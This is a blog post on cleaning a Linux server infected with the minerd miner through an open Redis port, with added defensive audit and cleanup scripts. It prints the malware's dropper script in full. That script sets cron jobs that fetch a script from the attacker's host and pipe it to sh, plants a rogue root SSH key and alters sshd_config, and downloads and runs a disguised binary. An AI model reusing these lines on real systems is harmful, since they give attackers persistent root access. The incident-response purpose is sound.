
Complete cleanup process after a Linux server is infected with minerd (detailed)

程序员文章站 2023-11-20 10:42:52

I carelessly installed a Redis service and opened its default port to the whole Internet. At first I thought this server had no public IP; by the time I found out otherwise it was too late to regret it.

One day I noticed the CPU load was unusually high and found a minerd process eating a lot of CPU. A quick Google search showed I had been hit.

Below is the cleanup process.

Step one

1. Immediately stop the Redis service, restrict access to the port, and add a password.
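Step 1 is the root cause of the whole incident, so a check that the Redis configuration is actually closed off belongs here. The script below is an added example, not the author's code; it reads a redis.conf and reports the three settings that decide whether an unauthenticated remote client can reach the instance (bind, protected-mode, requirepass). The file name redis_exposure_check.sh and the constructed config lines are assumptions.

```shell
#!/bin/sh
# redis_exposure_check.sh (hypothetical name, added example): report the
# redis.conf settings that let an unauthenticated remote client reach the
# instance, the exposure that led to the compromise described on this page.

# Print the file's live directives: comments and blank lines removed.
live_directives() {
    sed -e 's/#.*//' -e '/^[[:space:]]*$/d' "$1"
}

# Print one finding per weak setting in the redis.conf at $1, and nothing
# when the three settings that gate remote access are all safe.
redis_exposure_findings() {
    conf=$1
    # bind: unset means every interface; 0.0.0.0, * or :: mean the same thing.
    bind=$(live_directives "$conf" | awk 'tolower($1)=="bind"{$1="";print}' | tail -n1)
    if [ -z "$bind" ]; then
        echo "bind: unset, listens on all interfaces"
    else
        for a in $bind; do
            case "${a#-}" in
                0.0.0.0|'*'|::) echo "bind: $a exposes the port to every network" ;;
            esac
        done
    fi
    # protected-mode no disables Redis's built-in refusal of non-loopback clients.
    if live_directives "$conf" | awk 'tolower($1)=="protected-mode"{v=tolower($2)} END{exit v!="no"}'; then
        echo "protected-mode: no"
    fi
    # requirepass: without it any client that can connect has full access.
    if ! live_directives "$conf" | grep -qi '^[[:space:]]*requirepass[[:space:]]'; then
        echo "requirepass: unset, no authentication"
    fi
}

# Number of findings, for use in scripts and checks.
redis_exposure_count() {
    redis_exposure_findings "$1" | wc -l | tr -d ' '
}

# Run directly: redis_exposure_check.sh /etc/redis/redis.conf
if [ -n "${1:-}" ] && [ -f "$1" ]; then redis_exposure_findings "$1"; fi
```

A hardened file reports nothing: bind only on loopback (or the internal interface a firewall already restricts), protected-mode yes, and a requirepass set. Run it again after the service is brought back, since the author's step 1 stops Redis but the configuration is what keeps it closed.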


2. Following the write-ups online, delete the two crontab files:

sudo rm /var/spool/cron/root
sudo rm /var/spool/cron/crontabs/root

3. Know yourself and know your enemy, and you will never be defeated: study the malware's initialization file.

Contents of pm.sh (28 lines, as shown in the vim session; note that the page's copy has been lowercased, e.g. the key prefix AAAAB3NzaC1yc2E and curl -fsSL appear in lowercase):

export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/root/.ssh/khk75neoiq" ]; then
    mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys*
    echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/khk75neoiq
    echo "permitrootlogin yes" >> /etc/ssh/sshd_config
    echo "rsaauthentication yes" >> /etc/ssh/sshd_config
    echo "pubkeyauthentication yes" >> /etc/ssh/sshd_config
    echo "authorizedkeysfile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart
fi

if [ ! -f "/etc/init.d/ntp" ]; then
    if [ ! -f "/etc/systemd/system/ntp.service" ]; then
        mkdir -p /opt
        curl -fssl http://r.chanstring.com/v51/lady_`uname -m` -o /opt/khk75neoiq33 && chmod +x /opt/khk75neoiq33 && /opt/khk75neoiq33 -install
    fi
fi

/etc/init.d/ntp start

ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9

Findings

1. Delete the crontab configuration files, which we already did above. The code involved:

echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root

2. Delete these files; they are what gives the attacker passwordless login:

rm -f ~/.ssh/authorized_keys*
rm -f ~/.ssh/khk75neoiq

You can even delete the whole .ssh directory.
The code involved:

if [ ! -f "/root/.ssh/khk75neoiq" ]; then
    mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys*
    echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/khk75neoiq
    echo "permitrootlogin yes" >> /etc/ssh/sshd_config
    echo "rsaauthentication yes" >> /etc/ssh/sshd_config
    echo "pubkeyauthentication yes" >> /etc/ssh/sshd_config
    echo "authorizedkeysfile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart
fi

3. Delete the /opt directory; its contents are produced by the service from step 4.

4. Remove the service:

service ntp stop
rm /etc/init.d/ntp
rm /usr/sbin/ntp
The code involved:

if [ ! -f "/etc/init.d/ntp" ]; then
    if [ ! -f "/etc/systemd/system/ntp.service" ]; then
        mkdir -p /opt
        curl -fssl http://r.chanstring.com/v51/lady_`uname -m` -o /opt/khk75neoiq33 && chmod +x /opt/khk75neoiq33 && /opt/khk75neoiq33 -install
    fi
fi

The code above downloads an 8 MB program. What it installs, I don't know either, but the code that follows gives it away:

/etc/init.d/ntp start

This line starts the ntp service. A Baidu search says that is a time service, but here it is actually the malware's service. Opening that file and locating the executable /usr/sbin/ntp, I found it is byte-for-byte identical to the 8 MB file.

So delete this file.

Finally

ps aux|grep minerd

Kill all of those processes. OK, the fix is done.

Half an hour later

ps aux|grep minerd

The minerd process no longer appears.
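The analysis of pm.sh and the four cleanup steps above can be turned into one script that first lists every indicator on the host and then removes them, so the half-hour re-check is a count of zero rather than a grep. The script below is an added example, not the author's commands; the indicators (cron files, the khk75neoiq key file, the /opt/khk75neoiq33 payload, the fake ntp service) come from the pm.sh listing on this page. Every function takes a root prefix so it can be exercised on a copied or mock tree first; the file name minerd_ir.sh is an assumption. Two points the page's steps leave implicit are handled: /usr/sbin/ntp is confirmed byte-identical to the payload with cmp, and the AuthorizedKeysFile line that pm.sh appended to sshd_config is stripped, since deleting the key file alone leaves sshd still pointing at it.

```shell
#!/bin/sh
# minerd_ir.sh (hypothetical name, added example): audit and clean the
# persistence that the pm.sh listing above installs. Every path takes a root
# prefix ($1, default "/") so the functions can be exercised against a copied
# or mock filesystem tree before they touch a live host.

# Indicators taken from the pm.sh listing on this page.
C2_PATTERN='chanstring\.com'              # the cron line fetches pm.sh from here
KEY_FILE='root/.ssh/khk75neoiq'            # rogue authorized_keys file
PAYLOAD='opt/khk75neoiq33'                 # downloaded binary
NTP_BIN='usr/sbin/ntp'                     # the same binary installed as "ntp"
NTP_INIT='etc/init.d/ntp'                  # fake init script
NTP_UNIT='etc/systemd/system/ntp.service'  # pm.sh also checks for this unit
SSHD_CONFIG='etc/ssh/sshd_config'

# Print one line per indicator present under the prefix; always returns 0.
audit_host() {
    root=${1:-/}
    for f in "$root/var/spool/cron/root" "$root/var/spool/cron/crontabs/root"; do
        if [ -f "$f" ] && grep -qi "$C2_PATTERN" "$f"; then echo "cron dropper: $f"; fi
    done
    if [ -f "$root/$KEY_FILE" ]; then echo "rogue ssh key: $root/$KEY_FILE"; fi
    if [ -f "$root/$SSHD_CONFIG" ] && grep -qi 'khk75neoiq' "$root/$SSHD_CONFIG"; then
        echo "sshd_config: AuthorizedKeysFile points at the rogue key"
    fi
    for f in "$root/$PAYLOAD" "$root/$NTP_BIN" "$root/$NTP_INIT" "$root/$NTP_UNIT"; do
        if [ -e "$f" ]; then echo "miner service file: $f"; fi
    done
    return 0
}

# Number of indicators, for the re-check the page does half an hour later.
indicator_count() {
    audit_host "$1" | wc -l | tr -d ' '
}

# The page's observation made testable: /usr/sbin/ntp is byte-for-byte the
# downloaded payload. Returns 0 only when both exist and are identical.
ntp_is_payload() {
    root=${1:-/}
    [ -f "$root/$NTP_BIN" ] && [ -f "$root/$PAYLOAD" ] \
        && cmp -s "$root/$NTP_BIN" "$root/$PAYLOAD"
}

# Read-only: the processes the page's last step kills after ps aux|grep minerd.
miner_processes() {
    ps aux 2>/dev/null | grep -E '[m]inerd|khk75neoiq33' || true
}

# Remove the artifacts in the order the page uses (steps 1-4), then strip the
# sshd_config line pm.sh appended. PermitRootLogin yes is reported rather than
# removed, because an administrator may have set it deliberately.
clean_host() {
    root=${1:-/}
    rm -f "$root/var/spool/cron/root" "$root/var/spool/cron/crontabs/root"      # step 1
    rm -f "$root/$KEY_FILE" "$root"/root/.ssh/authorized_keys*                  # step 2
    if [ "$root" = / ]; then service ntp stop 2>/dev/null || true; fi           # step 4
    rm -f "$root/$PAYLOAD" "$root/$NTP_BIN" "$root/$NTP_INIT" "$root/$NTP_UNIT" # steps 3-4
    cfg="$root/$SSHD_CONFIG"
    if [ -f "$cfg" ]; then
        grep -vi 'khk75neoiq' "$cfg" > "$cfg.tmp" || true
        cat "$cfg.tmp" > "$cfg" && rm -f "$cfg.tmp"   # keeps the file's mode and owner
        grep -in '^permitrootlogin yes' "$cfg" | sed 's/^/review sshd_config line /' || true
    fi
    return 0
}

# Usage: minerd_ir.sh audit [prefix]  |  minerd_ir.sh clean [prefix]
case "${1:-}" in
    audit) audit_host "${2:-/}"; miner_processes ;;
    clean) clean_host "${2:-/}" ;;
esac
```

After clean on a live host, restore the legitimate root authorized_keys from a known-good copy (pm.sh wiped it before the cleanup ever ran), restart sshd so the stripped AuthorizedKeysFile line takes effect, and run audit again after the ten-minute cron interval has passed: a count of zero and an empty process list are the same check the author did with ps aux|grep minerd half an hour later.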
